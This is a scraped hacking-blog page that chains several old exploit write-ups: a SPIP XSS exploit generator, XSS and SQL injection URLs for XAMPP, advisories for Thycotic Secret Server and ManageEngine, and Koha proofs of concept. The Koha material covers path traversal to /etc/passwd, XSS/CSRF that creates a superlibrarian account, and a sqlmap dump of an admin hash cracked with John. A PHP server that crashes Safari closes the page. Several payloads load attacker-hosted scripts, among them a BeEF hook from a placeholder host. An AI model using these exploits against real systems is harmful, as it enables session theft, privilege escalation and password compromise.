source: https://www.securityfocus.com/bid/53983/info
SPIP is prone to multiple unspecified cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to SPIP 2.0.20, 2.1.15, and 3.0.2 are vulnerable.
Exploit generator:
------------------
<html>
<head>
<script>
function trim(s){
return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
}
function encodeToHex(s){
var r="";
var h;
for(var c=0;c<s.length;c++){
h=s.charCodeAt(c).toString(16);
while(h.length<3) h="%"+h;
r+=h;
}
return r;
}
function generateXSS(){
var target = trim(document.getElementById("target").value);
var version = trim(document.getElementById("version").value);
var content = trim(document.getElementById("content").value);
var resultjs = "";
resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>";
resultjs += "<input type='hidden' name='exec' value='" + version + "' />";
resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />";
resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
document.getElementById("resultjs").value = resultjs;
}
</script>
</head>
<body onload="generateXSS();">
<h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2>
<p>
This XSS, non-persistent, use POST vars through admin panel.<br />
The target is the attribute "name" of an input markup hidden.<br />
This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br />
Magic_quote_gcp = Off needed.
</p>
<form action="" onsubmit="generateXSS();return false;">
<table>
<tr>
<td>URL's SPIP Targeted :</td>
<td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td>
</tr>
<tr>
<td>SPIP version :</td>
<td>
<select id="version" onchange="generateXSS();">
<option value="base_repair">3.0.X (up to 3.0.1 included)</option>
<option value="admin_repair">2.1.X (up to 2.1.14 included)</option>
</select>
</td>
</tr>
<tr>
<td>JavaScript code to execute :<br />(without <script> & </script> markup)</td>
<td>
<textarea cols="70" rows="10" id="content" onkeyup="generateXSS();">
alert(document.cookie);
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ha.ck.er.xxx/beEf.js";
document.body.appendChild(script);
</textarea>
</td>
</tr>
<tr>
<td>Exploit to send to an admin : </td>
<td>
<textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea>
</td>
</tr>
</table>
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863158320
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/53979/info
XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script>
http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# CVE ID : CVE-2015-3443
# Product: Secret Server [1]
# Vendor: Thycotic
# Subject: Stored Cross-Site Scripting Vulnerability (XSS)
# Risk: High
# Effect: Remotely exploitable
# Author: Marco Delai (marco.delai@csnc.ch)
# Date: June 24th 2015
#
#############################################################
Introduction:
-------------
Thycotic Secret Server enterprise password management software allows
the creation, management and control of critical passwords in one
centralized, web-based repository [1].
The identified vulnerability (stored Cross-Site Scripting) allows the
execution of JavaScript code in the browser of a valid user when it
toggle the password mask on a specially crafted password. This allows,
for example, an attacker to prepare a specially crafted shared password,
which when read by another user, can steal all other passwords the
victim has access to.
Vulnerable:
-----------
Secret Server customers on version 8.6.000000 to 8.8.000004 [2].
Technical Details
--------------------
Exploiting the vulnerability simply requires to:
1. Create a new password entry within Secret Server with the following
value: "Compass Security<script>alert("Compass Security")</script>"
2. Open the basic dashboard and toggle the password mask. The password
is retrieved from the server using an AJAX call and its value is
added straight to the page's DOM without validation. Thus, the
script included in step 1 is executed.
Note that the payload defined in step 1 did only get executed in the
basic dashboard view. The advanced dashboard did adequately encode the
password. Extract of the vulnerable page:
GET
/SecretServer/api.ashx/simplehome/GetSecretItemValue?secretItemId=[...]&audi
tAction=unmask HTTP/1.1
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 62
Content-Type: application/json; charset=utf-8
Expires: -1
[...]
Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
X-Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-UA-Compatible: IE=edge
"Compass Security<script>alert(\"Compass Security\")</script>"
Remediation:
------------
Update Secret Server to the latest version, which fixes the
vulnerability [2].
Milestones:
-----------
2015-02-19 Vulnerability discovered
2015-02-20 Vulnerability reported to vendor
2015-02-20 Vendor patch [2]
2015-06-24 Public disclosure
References:
-----------
[1] http://thycotic.com/products/secret-server/
[2]
http://thycotic.com/products/secret-server/resources/advisories/thy-ss-004/
Title:
===============
ManageEngine Asset Explorer v6.1 - XSS Vulnerability
CVE-ID:
====================================
CVE-2015-2169
CVSS:
====================================
3.5
Product & Service Introduction (Taken from their homepage):
====================================
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM)
software that helps you monitor and manage assets in your network from
Planning phase to Disposal phase. AssetExplorer provides you with a number
of ways to ensure discovery of all the assets in your network. You can
manage software & hardware assets, ensure software license compliance and
track purchase orders & contracts - the whole nine yards! AssetExplorer is
very easy to install and works right out of the box.
(Homepage: https://www.manageengine.com/products/asset-explorer/ )
Abstract Advisory Information:
==============================
Cross site scripting attack can be performed on the manage engine asset
explorer. If the 'publisher' name contains vulnerable script, it gets
executed in the browser.
Affected Products:
====================
Manage Engine
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)
Severity Level:
====================
Medium
Technical Details & Description:
================================
Add a vendor with a script in it to the registry.
Login to the product,
Scan the endpoint where the registry is modified.
In the right pane, go to software->Scanned Software
The script gets executed.
Vulnerable Product(s):
ManageEngine Asset Explorer
Affected Version(s):
Version 6.1.0 / Build Number 6112
(Earlier versions i did not test)
Vulnerability Type(s):
Persistent Cross Site Scripting
PoC:
=======================
Add the following registry entry in the machine, for targeted attack.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"="<script> alert(\"XSS\"); </script>"
Security Risk:
==================
Medium.
Credits & Authors:
==================
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)
Timeline:
==================
Discovered at Wed, March 3, 2015
Informed manage engine about the vulnerability: March 4, 2015
Case moved to development team: March 4, 2015
Asked for updates: March 9, 2015
Asked for updates: March 13, 2015
Asked for updates: April 14, 2015
Public Disclosure at Mon, June 22, 2015
# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4632
### CVE-2015-4632 ###
#### Titel: ####
Directory traversal
#### Type of vulnerability: ####
File Path Traversal
##### Exploitation vector:
Injecting into the "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search
##### Attack outcome:
Read access to arbitrary files on the system
#### Impact: ####
{low,medium,high,critical}
high
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4632
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search
#### Proof-of-concept: ####
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4630, CVE-2015-4631
### CVE-2015-4631 ###
#### Titel: ####
Multiple XSS and XSRF vulnerabilities in Koha
#### Type of vulnerability: ####
Koha suffers from multiple critical XSS and XSRF vulnerabilities
##### Exploitation vector:
The attack can be performed through a compromised user account (for example previous password retrieval if student user acoount through SQLI - CVE-2015-4633) or due to user that clicks on a malicious link (for example in a phishing mail, forum link etc)
##### Attack outcome:
1. An attacker may escalate privileges and even gain superlibrarian permissions.
2. An attacker may target other users by stealing session tokens, impersonating them or exploiting browser vulnerabilities to gain access on their machines.
3. Perform unauthorized actions with the permissions of a staff member
4. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the websever
#### Impact: ####
{low,medium,high,critical}
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4631
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
Koha suffers from various critical XSS and XSRF vulnerabilities due to imprope input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks. This allows remote remote attackers to inject arbitrary web script or HTML and completely compromise the webpage.
The following pages are affected from stored XSS flaws:
/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl
The following pages are affected from relfective XSS flaws:
/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")
#### Proof-of-concept: ####
Attack scenario:
Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:
http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens
http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl
the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:
Create new user:
http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibririan permission:
http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.
# Exploit Title: Koha Open Source ILS - Unauthenticated SQL Injection in OPAC
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4633
### CVE-2015-4633 ###
#### Titel: ####
Unauthenticated SQL Injection in Koha
#### Type of vulnerability: ####
An Unauthenticated SQL Injection vulnerability in Koha allows attackers to read arbitrary data from the database.
##### Exploitation vector:
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
##### Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access the filesystem may be possible.
#### Impact: ####
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4633
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.
#### Proof-of-concept: ####
1. Inspect Koha database schema
Have a look at how to query the database for superlibrarian users:
http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we we need to execute some SQL statement like this:
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
2. Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150513}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: number (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
---
[09:20:09] [INFO] testing MySQL
[09:20:09] [INFO] confirming MySQL
[09:20:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
[09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
admin
[09:21:46] [INFO] retrieved: $2a$08$taQ
[09:23:33] [ERROR] invalid character detected. retrying..
[09:23:33] [WARNING] increasing time delay to 5 seconds
afOgEEhU
[09:25:10] [ERROR] invalid character detected. retrying..
[09:25:10] [WARNING] increasing time delay to 6 seconds
t/gW
[09:26:13] [ERROR] invalid character detected. retrying..
[09:26:13] [WARNING] increasing time delay to 7 seconds
TOmqnYe1Y6ZNxCENa
[09:29:57] [ERROR] invalid character detected. retrying..
[09:29:57] [WARNING] increasing time delay to 8 seconds
2.ONk2eZhnuEw5z9OjjxS
[09:35:08] [ERROR] invalid character detected. retrying..
[09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:
'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
3. Feed john the ripper and be lucky
root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
root@kali:/home/wicked# john ./admin-pass
Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
admin (?)
guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate
Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show
?:admin
1 password hash cracked, 0 left
4. Log in with username "admin" and password "admin" ;)
### CVE-2015-xxxx ###
#### Titel: ####
Unauthenticated SQL Injection
#### Type of vulnerability: ####
SQL Injection vulnerabilities in Koha staff client allows attackers to read arbitrary data from the database.
##### Exploitation vector:
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
##### Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem is possible.
#### Impact: ####
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-xxxx
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.
#### Proof-of-concept: ####
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
#!/usr/bin/php
<?php
# Title : Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of
Concept
# Product Website: https://www.apple.com/safari/
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
# Usage :
# php poc.php
# Open Safari and open ip:8080 / 127.0.0.1:8080
# Crashed ;)
#Main POC Code
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create
socket!');
socket_bind($reza, 0,8080);
socket_listen($reza);
print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
$msg =
'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
$msgd=base64_decode($msg);
for (;;) {
if ($client = @socket_accept($reza)) {
socket_write($client, "HTTP/1.1 200 OK\r\n" .
"Content-length: " . strlen($msgd) . "\r\n" .
"Content-Type: text/html; charset=UTF-8\r\n\r\n" .
$msgd);
}
else usleep(100000);
}
#Crash Report
/*
Process Model:
Multiple Web Processes
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_kernel.dylib 0x00007fff8e628286 __pthread_kill +
10
1 libsystem_c.dylib 0x00007fff90619b53 abort + 129
2 libsystem_c.dylib 0x00007fff905e1c39 __assert_rtn + 321
3 com.apple.CoreGraphics 0x00007fff87716e4e
CGPathCreateMutableCopyByTransformingPath + 242
4 com.apple.CoreGraphics 0x00007fff8773aff0 CGContextAddPath +
93
5 com.apple.WebCore 0x0000000104ea8c84
WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6 com.apple.WebCore 0x000000010597e851
WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&,
WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*,
WebCore::RenderSVGShape const*) + 65
7 com.apple.WebCore 0x000000010597f08a
WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&,
WebCore::GraphicsContext*) + 122
8 com.apple.WebCore 0x000000010597f3c3
WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
9 com.apple.WebCore 0x0000000104fa73cb
WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 379
10 com.apple.WebCore 0x0000000104fa7062
WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 1330
11 com.apple.WebCore 0x0000000104f1ee72
WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 722
12 com.apple.WebCore 0x0000000105429e88
WebCore::InlineElementBox::paint(WebCore::PaintInfo&,
WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) +
312
13 com.apple.WebCore 0x0000000104ea4a63
WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
14 com.apple.WebCore 0x0000000104ea4509
WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
15 com.apple.WebCore 0x0000000104e53d96
WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*,
WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
16 com.apple.WebCore 0x0000000104e51373
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 67
17 com.apple.WebCore 0x0000000104e50724
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 420
18 com.apple.WebCore 0x0000000104e529af
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 287
19 com.apple.WebCore 0x00000001058db139
WebCore::RenderBlock::paintChild(WebCore::RenderBox&,
WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&,
bool) + 393
20 com.apple.WebCore 0x0000000104e51478
WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&,
WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
21 com.apple.WebCore 0x0000000104e51420
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 240
22 com.apple.WebCore 0x0000000104e50724
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 420
23 com.apple.WebCore 0x0000000104e529af
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 287
24 com.apple.WebCore 0x0000000104e512b2
WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase,
WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&,
WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo
const&, unsigned int, WebCore::RenderObject*) + 370
25 com.apple.WebCore 0x0000000104e50f87
WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment,
1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*,
WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int,
WebCore::RenderObject*, bool, bool) + 423
26 com.apple.WebCore 0x0000000104e4fc30
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
